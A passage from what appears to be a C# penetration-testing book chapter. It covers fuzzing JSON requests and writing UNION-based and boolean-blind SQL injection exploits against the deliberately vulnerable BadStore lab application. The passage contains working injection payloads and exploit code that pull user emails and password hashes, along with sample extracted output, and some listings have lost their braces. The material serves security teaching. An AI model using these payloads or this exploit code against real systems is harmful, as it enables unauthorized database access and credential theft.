ERROR: 42601: syntax error at or near &quot;dsa&quot;

Listing 2-24: Sample MySQL error message containing syntax error

The second string, "unterminated" , appears in a specific MySQL error when a string is not terminated, as in Listing 2-25.

ERROR: 42601: unterminated quoted string at or near "'); "

Listing 2-25: Sample MySQL error message containing unterminated

The appearance of either error message could mean a SQL injection vulnerability exists within an application. If the response from an error returned contains either string, we return a value of true to the calling method, which means we think the application is vulnerable. Otherwise, we return false.

Testing the JSON Fuzzer

Having completed the three methods required to fuzz the HTTP JSON request, we can test the Create User HTTP request, as shown in Listing 2-26.

$ fuzzer.exe /Users/bperry/req_vulnjson
Fuzzing POST requests to URL
Fuzzing key: username
SQL injection vector: username
Fuzzing key: password
SQL injection vector: password
Fuzzing key: age
Converting int type to string to fuzz
SQL injection vector: age
Fuzzing key: line1
SQL injection vector: line1
Fuzzing key: line2
SQL injection vector: line2
Fuzzing key: city
SQL injection vector: city
Fuzzing key: state
SQL injection vector: state
Fuzzing key: zip
Converting int type to string to fuzz
SQL injection vector: zip
Fuzzing key: first
first does not seem vulnerable.
Fuzzing key: middle
middle does not seem vulnerable.
Fuzzing key: last
last does not seem vulnerable.
Fuzzing key: method
method does not seem vulnerable.

Listing 2-26: The output from running the JSON fuzzer against the CsharpVulnJson application

Running the fuzzer on the Create User request should show that most parameters are vulnerable to a SQL injection attack (the lines beginning with SQL injection vector), except for the method JSON key used by the web application to determine which operation to complete. Notice that even the age and zip parameters, originally integers in the JSON, are vulnerable if they are converted to a string when tested.

Exploiting SQL Injections

Finding possible SQL injections is only half the job of a penetration tester; exploiting them is the more important and more difficult half. Earlier in the chapter, we used a URL from BadStore to fuzz HTTP query string parameters, one of which was a vulnerable query string parameter called searchquery (refer back to Listing 2-13 on page 25). The URL query string parameter searchquery is vulnerable to two types of SQL injection techniques. Both injection types (boolean based and UNION based) are incredibly useful to understand, so I’ll describe writing exploits for both types using the same vulnerable BadStore URL.

The UNION technique is the easier one to use when exploiting SQL injections. It’s possible to use a UNION in SELECT query injections when you’re able to control the end of the SQL query. An attacker who can append a UNION statement to the end of a SELECT statement can return more rows of data to the web application than originally intended by the programmer.

One of the trickiest parts of figuring out a UNION injection lies in balancing the columns. In essence, you must balance the same number of columns with the UNION clause as the original SELECT statement returns from the database. Another challenge lies in being able to programmatically tell where your injected results appear in the response from the web server.

Performing a UNION-Based Exploit by Hand

Using UNION-based SQL injections is the fastest way to retrieve data from a database. In order to retrieve attacker-controlled data from the database with this technique, we must build a payload that retrieves the same number of columns as the original SQL query in the web application. Once we can balance the columns, we need to be able to programmatically find the data from the database in the HTTP response.

When an attempt is made to balance the columns in a UNION-injectable SQL injection and the columns don’t balance, the error generally returned by the web application using MySQL is similar to that shown in Listing 2-27.

The used SELECT statements have a different number of columns...

Listing 2-27: Sample MySQL error when SELECT queries on the left and right of UNION aren’t balanced

Let’s take the vulnerable line of code in the BadStore web application (badstore.cgi, line 203) and see how many columns it is selecting (see Listing 2-28).

$sql="SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE '$squery' IN (itemnum,sdesc,ldesc)";

Listing 2-28: Vulnerable line in the BadStore web application selecting four columns

Balancing SELECT statements takes a bit of testing, but I know from reading the source code of BadStore that this particular SELECT query returns four columns. When passing in the payload with spaces that are URL-encoded as plus signs, as shown in Listing 2-29, we find the word hacked returned as a row in the search results.

searchquery=fdas'+UNION+ALL+SELECT+NULL, NULL, 'hacked', NULL%23

Listing 2-29: Properly balanced SQL injection that brings the word hacked back from the database

When the searchquery value in this payload is passed to the application, the searchquery variable is used directly in the SQL query sent to the database, and we turn the original SQL query (Listing 2-28) into a new SQL query not intended by the original programmer, as shown in Listing 2-30.

SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'fdas' UNION ALL SELECT
NULL, NULL, 'hacked', NULL# ' IN (itemnum,sdesc,ldesc)

Listing 2-30: Full SQL query with the payload appended that returns the word hacked

We use a hash mark to truncate the original SQL query, turning any SQL code following our payload into a comment that will not be run by MySQL. Now, any extra data (the word hacked in this case) that we want returned in the web server’s response should be in the third column of the UNION.

Humans can determine fairly easily where the data returned by the payload shows up in the web page after exploitation. A computer, however, needs to be told where to look for any data brought back from a SQL injection exploit. It can be difficult to programmatically detect where the attacker-controlled data is in the server response. To make this easier, we can use the CONCAT SQL function to surround the data we actually care about with known markers, as in Listing 2-31.

searchquery=fdsa'+UNION+ALL+SELECT+NULL, NULL, CONCAT(0x71766a7a71,'hacked',0x716b626b71), NULL#

Listing 2-31: Sample payload for the searchquery parameter that returns the word hacked

The payload in Listing 2-31 uses hexadecimal values to add data to the left and right of the extra value hacked we select with our payload. If the payload is echoed back in the HTML from the web application, a regular expression won’t accidentally match the original payload. In this example, 0x71766a7a71 is qvjzq and 0x716b626b71 is qkbkq. If the injection works, the response should contain qvjzqhackedqkbkq. If the injection doesn’t work, and the search results are echoed back as is, a regular expression such as qvjzq(.*)qkbkq would not match the hexadecimal values in the original payload. The MySQL CONCAT() function is a handy way to ensure that our exploit will grab the correct data from the web server response.

Listing 2-32 shows a more useful example. Here, we can replace the CONCAT() function from the previous payload to return the current database, surrounded by the known left and right markers.

CONCAT(0x7176627a71, DATABASE(), 0x71766b7671)

Listing 2-32: Sample payload that returns the current database name

The result of the injection on the BadStore search function should be qvbzqbadstoredbqvkvq. A regular expression such as qvbzq(.*)qvkvq should return the value of badstoredb, the name of the current database.

Now that we know how to efficiently get the values out of the database, we can begin siphoning data out of the current database using the UNION injection. One particularly useful table in most web applications is the users table. As you can see in Listing 2-33, we can easily use the UNION injection technique described earlier to enumerate the users and their password hashes from the users table (called userdb) with a single request and payload.

searchquery=fdas'+UNION+ALL+SELECT+NULL, NULL, CONCAT(0x716b717671, email,
0x776872786573, passwd,0x71767a7a71), NULL+FROM+badstoredb.userdb#

Listing 2-33: This payload pulls the emails and passwords from the BadStore database separated by left, middle, and right markers.

The results should show up on the web page in the item table if the injection is successful.

Performing a UNION-Based Exploit Programmatically

Now let’s look at how we can perform this exploit programmatically using some C# and the HTTP classes. By putting the payload shown in Listing 2-33 in the searchquery parameter, we should see an item table in the web page with usernames and password hashes instead of any real items. All we need to do is make a single HTTP request and then use a regular expression to pull the emails and password hashes between the markers from the HTTP server’s response.

Creating the Markers to Find the Usernames and Passwords

First, we need to create the markers for the regular expression, as shown in Listing 2-34. These markers will be used to delineate the values brought back from the database during the SQL injection. We want to use random-looking strings not likely to be found in the HTML source code so that our regular expression will only grab the usernames and password hashes we want from the HTML returned in the HTTP response.

string frontMarker = "FrOnTMaRker";
string middleMarker = "mIdDlEMaRker";
string endMarker = "eNdMaRker";
string frontHex = string.Join("", frontMarker.Select(c => ((int)c).ToString("X2")));
string middleHex = string.Join("", middleMarker.Select(c => ((int)c).ToString("X2")));
string endHex = string.Join("", endMarker.Select(c => ((int)c).ToString("X2")));

Listing 2-34: Creating the markers to be used in the UNION-based SQL injection payload

To start things off, we create three strings to be used as the front , middle , and end markers. These will be used to find and separate the usernames and passwords we pulled from the database in the HTTP response. We also need to create the hexadecimal representations of the markers that will go in the payload. To do this, each marker needs to be processed a little bit.

We use the LINQ method Select() to iterate over each character in the marker string, convert each character into its hexadecimal representation, and return an array of the data processed. In this case, it returns an array of 2-byte strings, each of which is the hexadecimal representation of a character in the original marker.

In order to create a full hexadecimal string from this array, we use the Join() method to join each element in the array, creating a hexadecimal string representing each marker.

Building the URL with the Payload

Now we need to build the URL and the payload to make the HTTP request, as shown in Listing 2-35.

string url = "http://" + args[0] + "/cgi-bin/badstore.cgi";

string payload = "fdsa' UNION ALL SELECT";
payload += " NULL, NULL, NULL, CONCAT(0x"+frontHex+", IFNULL(CAST(email AS";
payload += " CHAR), 0x20),0x"+middleHex+", IFNULL(CAST(passwd AS";
payload += " CHAR), 0x20), 0x"+endHex+") FROM badstoredb.userdb# ";

url += "?searchquery=" + Uri.EscapeUriString(payload) + "&action=search";

Listing 2-35: Building the URL with the payload in the Main() method of the exploit

We create the URL to make the request using the first argument passed to the exploit: an IP address of the BadStore instance. Once the base URL is created, we create the payload to be used to return the usernames and password hashes from the database, including the three hexadecimal strings we made of the markers to separate the usernames from the passwords. As stated earlier, we encode the markers in hexadecimal to ensure that, in case the markers are echoed back without the data we want, our regular expression won’t accidentally match them and return junk data. Finally, we combine the payload and the URL by appending the vulnerable query string parameters with the payload on the base URL. To ensure that the payload doesn’t contain any characters unique to the HTTP protocol, we pass the payload to EscapeUriString() before inserting it into the query string.

Making the HTTP Request

We are now ready to make the request and receive the HTTP response containing the usernames and password hashes that were pulled from the database with the SQL injection payload (see Listing 2-36).

HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
string response = string.Empty;
using (StreamReader reader = new StreamReader(request.GetResponse().GetResponseStream()))
  response = reader.ReadToEnd();

Listing 2-36: Creating the HTTP request and reading the response from the server

We create a basic GET request by creating a new HttpWebRequest with the URL we built previously containing the SQL injection payload. We then declare a string to hold our response, assigning it an empty string by default. Within the context of a using statement, we instantiate a StreamReader and read the response into our response string. Now that we have the response from the server, we can create a regular expression using our markers to find the usernames and passwords within the HTTP response, as Listing 2-37 shows.

  Regex payloadRegex = new Regex(frontMarker + "(.*?)" + middleMarker + "(.*?)" + endMarker);
  MatchCollection matches = payloadRegex.Matches(response);
  foreach (Match match in matches)
    Console.WriteLine("Username: " + match.Groups [1].Value + " ");
    Console.Write("Password hash: " + match.Groups[2].Value);

Listing 2-37: Matching the server response against the regular expression to pull out database values

Here, we find and print the values retrieved with the SQL injection from the HTTP response. We first use the Regex class (in the namespace System.Text.RegularExpressions) to create a regular expression. This regular expression contains two expression groups that capture the username and password hash from a match, using the front, middle, and end markers defined previously. We then call the Matches() method on the regular expression, passing the response data as an argument to Matches(). The Matches() method returns a MatchCollection object, which we can iterate over using a foreach loop to retrieve each string in the response that matches the regular expression created earlier using our markers.

As we iterate over each expression match, we print the username and password hash. Using the WriteLine() method to print the values, we build a string using the expression group captures for the usernames and the passwords , which are stored the Groups property of the expression match.

Running the exploit should result in the printout shown in Listing 2-38.

Username: AAA_Test_User       Password hash: 098F6BCD4621D373CADE4E832627B4F6
Username: admin               Password hash: 5EBE2294ECD0E0F08EAB7690D2A6EE69
Username: [email protected]    Password hash: 62072d95acb588c7ee9d6fa0c6c85155
Username: [email protected]     Password hash: 9726255eec083aa56dc0449a21b33190
Username: [email protected]  Password hash: 7f43c1e438dc11a93d19616549d4b701

Listing 2-38: Sample output from the UNION-based exploit

As you can see, with a single request we were able to extract all the usernames and password hashes from the userdb table in the BadStore MySQL database using a UNION SQL injection.

Exploiting Boolean-Blind SQL Vulnerabilities

A blind SQL injection, also known as a Boolean-based blind SQL injection, is one in which an attacker doesn’t get direct information from a database but can extract information indirectly from the database, generally 1 byte at a time, by asking true-or-false questions.

How Blind SQL Injections Work

Blind SQL injections require a bit more code than UNION exploits in order to efficiently exploit a SQL injection vulnerability, and they take much more time to complete because so many HTTP requests are required. They are also far noisier on the server’s side than something like the UNION exploit and may leave much more evidence in logs.

When performing a blind SQL injection, you get no direct feedback from the web application; you rely instead on metadata, such as behavior changes, in order to glean information from a database. For instance, by using the RLIKE MySQL keyword to match values in the database with a regular expression, as shown in Listing 2-39, we can cause an error to display in BadStore.


Listing 2-39: Sample RLIKE blind SQL injection payload that causes an error in BadStore

When passed to BadStore, RLIKE will attempt to parse the hexadecimal-encoded string as a regular expression, causing an error (see Listing 2-40) because the string passed is a special character in regular expressions. The open parenthesis [ ( ] character (0x28 in hexadecimal) denotes the beginning of an expression group, which we also used to match usernames and password hashes in the UNION exploit. The open parenthesis character must have a corresponding close parenthesis [ ) ] character; otherwise, the syntax for the regular expression will be invalid.

Got error 'parentheses not balanced' from regexp

Listing 2-40: Error from RLIKE when an invalid regular expression is passed in

The parentheses are not balanced because a close parenthesis is missing. Now we know that we can reliably control the behavior of BadStore using true and false SQL queries to cause it to error.

Using RLIKE to Create True and False Responses

We can use a CASE statement in MySQL (which behaves like a case statement in C-like languages) to deterministically select a good or bad regular expression for RLIKE to parse. For example, Listing 2-41 returns a true response.


Listing 2-41: An RLIKE blind payload that should return a true response

The CASE statement first determines whether 1=1 is true. Because this equation is true, 0x28 is returned as the regular expression that RLIKE will try to parse, but because ( is not a valid regular expression, an error should be thrown by the web application. If we manipulate the CASE criteria of 1=1 (which evaluates to true) to be 1=2, the web application no longer throws an error. Because 1=2 evaluates to false, 0x41 (an uppercase A in hexadecimal) is returned to be parsed by RLIKE and does not cause a parsing error.

By asking true-or-false questions (does this equal that?) of the web application, we can determine how it behaves and then, based on that behavior, determine whether the answer to our question was true or false.

Using the RLIKE Keyword to Match Search Criteria

The payload in Listing 2-42 for the searchquery parameter should return a true response (an error) because the length of the number of rows in the userdb table is greater than 1.


Listing 2-42: Sample Boolean-based SQL injection payload for the searchquery parameter

Using the RLIKE and CASE statements, we check whether the length of the count of the BadStore userdb is equal to 1. The COUNT(*) statement returns an integer, which is the number of rows in a table. We can use this number to significantly reduce the number of requests needed to finish an attack.

If we modify the payload to determine whether the length of the number of rows is equal to 2 instead of 1 , the server should return a true response that contains an error that says “parentheses not balanced.” For example, say BadStore has 999 users in the userdb table. Although you might expect that we’d need to send at least 1,000 requests to determine whether the number returned by COUNT(*) was greater than 999, we can brute-force each individual digit (each instance of 9) much faster than we could the whole number (999). The length of the number 999 is three, since 999 is three characters long. If, instead of brute-forcing the whole number 999, we brute-force the first, second, and then third digits individually, we would have the whole number 999 brute-forced in just 30 requests—up to 10 requests per single number.

Determining and Printing the Number of Rows in the userdb Table

To make this a bit more clear, let’s write a Main() method to determine how many rows are contained in the userdb table. With the for loop shown in Listing 2-43, we determine the length of the number of rows contained in the userdb table.

int countLength = 1;
for (;;countLength++)
  string getCountLength = "fdsa' RLIKE (SELECT (CASE WHEN ((SELECT";
  getCountLength += " LENGTH(IFNULL(CAST(COUNT(*) AS CHAR),0x20)) FROM";
  getCountLength += " userdb)="+countLength+") THEN 0x28 ELSE 0x41 END))";
  getCountLength += " AND 'LeSo'='LeSo";

  string response = MakeRequest(getCountLength);
  if (response.Contains("parentheses not balanced"))

Listing 2-43: The for loop retrieving the length of the database count of the user database

We begin with a countLength of zero and then increment countLength by 1 each time through the loop, checking whether the response to the request contains the true string "parentheses not balanced". If so, we break out of the for loop with the correct countLength, which should be 23.

Then we ask the server for the number of rows contained in the userdb table, as shown in Listing 2-44.

List<byte> countBytes = new List<byte>();
for (int i = 1; i <= countLength; i++)
  for (int c = 48; c <= 58; c++)
    string getCount = "fdsa' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT";
    getCount += " IFNULL(CAST(COUNT(*) AS CHAR), 0x20) FROM userdb),";
    getCount += i+ ", 1))="+c+") THEN 0x28 ELSE 0x41 END)) AND '";
    string response = MakeRequest (getCount);

    if (response.Contains("parentheses not balanced"))

Listing 2-44: Retrieving the number of rows in the userdb table

The SQL payload used in Listing 2-44 is a bit different from the previous SQL payloads used to retrieve the count. We use the ORD() and MID() SQL functions.

The ORD() function converts a given input into an integer, and the MID() function returns a particular substring, based on a starting index and length to return. By using both functions, we can select one character at a time from a string returned by a SELECT statement and convert it to an integer. This allows us to compare the integer representation of the byte in the string to to the character value we are testing for in the current interation.

The MID() function takes three arguments: the string you are selecting a substring from ; the starting index (which is 1 based, not 0 based, as you might expect) ; and the length of the substring to select . Notice that the second argument to MID() is dictated by the current iteration of the outermost for loop, where we increment i up to the count length determined in the previous for loop. This argument selects the next character in the string to test as we iterate and increment it. The inner for loop iterates over the integer equivalents of the ASCII characters 0 through 9. Because we’re only attempting to get the row count in the database, we only care about numerical characters.

Both the i and c variables are used in the SQL payload during the Boolean injection attack. The variable i is used as the second argument in the MID() function, dictating the character position in the database value we will test. The variable c is the integer we are comparing the result of ORD() to, which converts the character returned by MID() to an integer. This allows us to iterate over each character in a given value in the database and brute-force the character using true-or-false questions.

When the payload returns the error "parentheses not balanced" , we know that the character at index i equals the integer c of the inner loop. We then cast c to a byte and add it to a List<byte> instantiated before looping. Finally, we break out of the inner loop to iterate through the outer loop and, once the for loops have completed, we convert the List<byte> into a printable string.

This string is then printed to the screen, as shown in Listing 2-45.

  int count = int.Parse(Encoding.ASCII.GetString(countBytes.ToArray()));
  Console.WriteLine("There are "+count+" rows in the userdb table");

Listing 2-45: Converting the string retrieved by the SQL injection and printing the number of rows in the table

We use the GetString() method (from the Encoding.ASCII class) to convert the array of bytes returned by countBytes.ToArray() into a human-readable string. This string is then passed to int.Parse(), which parses it and returns an integer (if the string can be converted to an integer). The string is then printed using Console.WriteLine().

The MakeRequest() Method

We’re just about ready to run our exploit, save for one more thing: we need a way to send payloads within the for loops. To do so, we need to write the MakeRequest() method, which takes a single argument: the payload to send (see Listing 2-46).

private static string MakeRequest(string payload)
  string url = "";
  HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url+payload);

  string response = string.Empty;
  using (StreamReader reader = new StreamReader(request.GetResponse().GetResponseStream()))
    response = reader.ReadToEnd();

  return response;

Listing 2-46: The MakeRequest() method sending the payload and returning the server’s response

We create a basic GET HttpWebRequest using the payload and URL to the BadStore instance. Then, using a StreamReader , we read the response into a string and return the response to the caller. Now we run the exploit and should receive something like the output shown in Listing 2-47.

There are 23 rows in the userdb table

Listing 2-47: Determining the number of rows in the userdb table

After running the first piece of our exploit, we see we have 23 users to pull usernames and password hashes for. The next piece of the exploit will pull out the actual usernames and password hashes.

Retrieving the Lengths of the Values

Before we can pull any values from the columns in the database, byte by byte, we need to get the lengths of the values. Listing 2-48 shows how this can be done.

private static int GetLength(int row, string column)
  int countLength = 0;
  for (;; countLength++)
    string getCountLength = "fdsa' RLIKE (SELECT (CASE WHEN ((SELECT";
    getCountLength += " LENGTH(IFNULL(CAST(CHAR_LENGTH("+column+") AS";
    getCountLength += " CHAR),0x20)) FROM userdb ORDER BY email LIMIT";
    getCountLength += row+",1)="+countLength+") THEN 0x28 ELSE 0x41 END)) AND";
    getCountLength += " 'YIye'='YIye";

    string response = MakeRequest(getCountLength);

    if (response.Contains("parentheses not balanced"))

Listing 2-48: Retrieving the length of certain values in the database

The GetLength() method takes two arguments: the database row to pull the value from and the database column in which the value will reside . We use a for loop (see Listing 2-49) to gather the length of the rows in the userdb table. But unlike in the previous SQL payloads, we use the function CHAR_LENGTH() instead of LENGTH because the strings being pulled could be 16-bit Unicode instead of 8-bit ASCII. We also use a LIMIT clause to specify that we want to pull the value from a specific row returned from the full users table. After retrieving the length of the value in the database, we can retrieve the actual value a byte at a time, as shown in Listing 2-49.

  List<byte> countBytes = new List<byte> ();
  for (int i = 0; i <= countLength; i++)
    for (int c = 48; c <= 58; c++)
      string getLength = "fdsa' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT";
      getLength += " IFNULL(CAST(CHAR_LENGTH(" + column + ") AS CHAR),0x20) FROM";
      getLength += " userdb ORDER BY email LIMIT " + row + ",1)," + i;
      getLength += ",1))="+c+") THEN 0x28 ELSE 0x41 END)) AND 'YIye'='YIye";
      string response = MakeRequest(getLength);
      if (response.Contains("parentheses not balanced"))

Listing 2-49: The second loop within the GetLength() method retrieving the actual length of the value

As you can see in Listing 2-49, we create a generic List<byte> to store the values gleaned by the payloads so that we can convert them into integers and return them to the caller. As we iterate over the length of the count, we send HTTP requests to test the bytes in the value using MakeRequest() and the SQL injection payload. If the response contains the "parentheses not balanced" error , we know our SQL payload evaluated to true. This means we need to store the value of c (the character that was determined to match i) as a byte so that we can convert the List<byte> to a human-readable string. Since we found the current character, we don’t need to test the given index of the count anymore, so we break to move on to the next index.

Now we need to return the count and finish the method, as shown in Listing 2-50.

  if (countBytes.Count > 0)
    return int.Parse(Encoding.ASCII.GetString(countBytes.ToArray()));
    return 0;

Listing 2-50: The final line in the GetLength() method, converting the value for the length into an integer and returning it

Once we have the bytes of the count, we can use GetString() to convert the bytes gathered into a human-readable string. This string is passed to int.Parse() and returned to the caller so that we can begin gathering the actual values from the database.

Writing GetValue() to Retrieve a Given Value

We finish this exploit with the GetValue() method, as shown in Listing 2-51.

private static string GetValue(int row, string column, int length)
  List<byte> valBytes = new List<byte>();
  for (int i = 0; i <= length; i++)
  for(int c = 32; c <= 126; c++)
     string getChar = "fdsa' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT";
     getChar += " IFNULL(CAST("+column+" AS CHAR),0x20) FROM userdb ORDER BY";
     getChar += " email LIMIT "+row+",1),"+i+",1))="+c+") THEN 0x28 ELSE 0x41";
     getChar += " END)) AND 'YIye'='YIye";
     string response = MakeRequest(getChar);

     if (response.Contains("parentheses not balanced"))
 return Encoding.ASCII.GetString(valBytes.ToArray());

Listing 2-51: The GetValue() method, which will retrieve the value of a given column at a given row

The GetValue() method requires three arguments: the database row we are pulling the data from , the database column in which the value resides , and the length of the value to be gleaned from the database . A new List<byte> is instantiated to store the bytes of the value gathered.

In the innermost for loop , we iterate from 32 to 126 because 32 is the lowest integer that corresponds to a printable ASCII character, and 126 is the highest. Earlier when retrieving the counts, we only iterated from 48 to 58 because we were only concerned with the numerical ASCII character.

As we iterate through these values, we send a payload comparing the current index of the value in the database to the current value of the iteration of the inner for loop. When the response is returned, we look for the error "parentheses not balanced" and, if it is found, cast the value of the current inner iteration to a byte and store it in the list of bytes. The last line of the method converts this list to a string using GetString() and returns the new string to the caller.

Calling the Methods and Printing the Values

All that is left now is to call the new methods GetLength() and GetValue() in our Main() method and to print the values gleaned from the database. As shown in Listing 2-52, we add the for loop that calls the GetLength() and GetValue() methods to the end of our Main() method so that we can extract the email addresses and password hashes from the database.

for (int row = 0; row < count; row++)
  foreach (string column in new string[] {"email", "passwd"})
    Console.Write("Getting length of query value... ");
    int valLength = GetLength(row, column);

    Console.Write("Getting value... ");
    string value = GetValue(row, column, valLength);

Listing 2-52: The for loop added to the Main() method, which consumes the GetLength() and GetValue() methods

For each row in the userdb table, we first get the length and value of the email field and then the value of the passwd field (an MD5 hash of the user’s password). Next, we print the length of the field and its value, with results like those shown in Listing 2-53.

There are 23 rows in the userdb table
Getting length of query value... 13
Getting value... AAA_Test_User
Getting length of query value... 32
Getting value... 098F6BCD4621D373CADE4E832627B4F6
Getting length of query value... 5
Getting value... admin
Getting length of query value... 32
Getting value... 5EBE2294ECD0E0F08EAB7690D2A6EE69
Getting length of query value... 18
Getting value... [email protected]
Getting length of query value... 32
Getting value... 7f43c1e438dc11a93d19616549d4b701

Listing 2-53: The results of our exploit

After enumerating the number of users in the database, we iterate over each user and pull the username and password hash out of the database. This process is much slower than the UNION we performed above, but UNION injections are not always available. Understanding how a Boolean-based attack works when exploiting SQL injections is crucial to effectively exploiting many SQL injections.


This chapter has introduced you to fuzzing for and exploiting XSS and SQL injection vulnerabilities. As you’ve seen, BadStore contains numerous SQL injection, XSS, and other vulnerabilities, all of which are exploitable in slightly different ways. In the chapter, we implemented a small GET request fuzzing application to search query string parameters for XSS or errors that could mean a SQL injection vulnerability exists. Using the powerful and flexible HttpWebRequest class to make and retrieve HTTP requests and responses, we were able to determine that the searchquery parameter, when searching for items in BadStore, is vulnerable to both XSS and SQL injection.

Once we wrote a simple GET request fuzzer, we captured an HTTP POST request from BadStore using the Burp Suite HTTP proxy and Firefox in order to write a small fuzzing application for POST requests. Using the same classes as those in the previous GET requests fuzzer, but with some new methods, we were able to find even more SQL injection vulnerabilities that could be exploitable.

Next, we moved on to more complicated requests, such as HTTP requests with JSON. Using a vulnerable JSON web application, we captured a request used to create new users on the web app using Burp Suite. In order to efficiently fuzz this type of HTTP request, we introduced the Json.NET library, which makes it easy to parse and consume JSON data.

Finally, once you had a good grasp on how fuzzers can find possible vulnerabilities in web applications, you learned how to exploit them. Using BadStore again, we wrote a UNION-based SQL injection exploit that could pull out the usernames and password hashes in the BadStore database with a single HTTP request. In order to efficiently pull the extracted data out of the HTML returned by the server, we used the regular expression classes Regex, Match, and MatchCollection.

Once the simpler UNION exploit was complete, we wrote a Boolean-based blind SQL injection on the same HTTP request. Using the HttpWebRequest class, we determined which of the HTTP responses were true or false, based on SQL injection payloads passed to the web application. When we knew how the web application would behave in response to true-or-false questions, we began asking the database true-or-false questions in order to glean information from it 1 byte at a time. The Boolean-based blind exploit is more complicated than the UNION exploit and requires more time and HTTP requests to complete, but it is particularly useful when a UNION isn’t possible.

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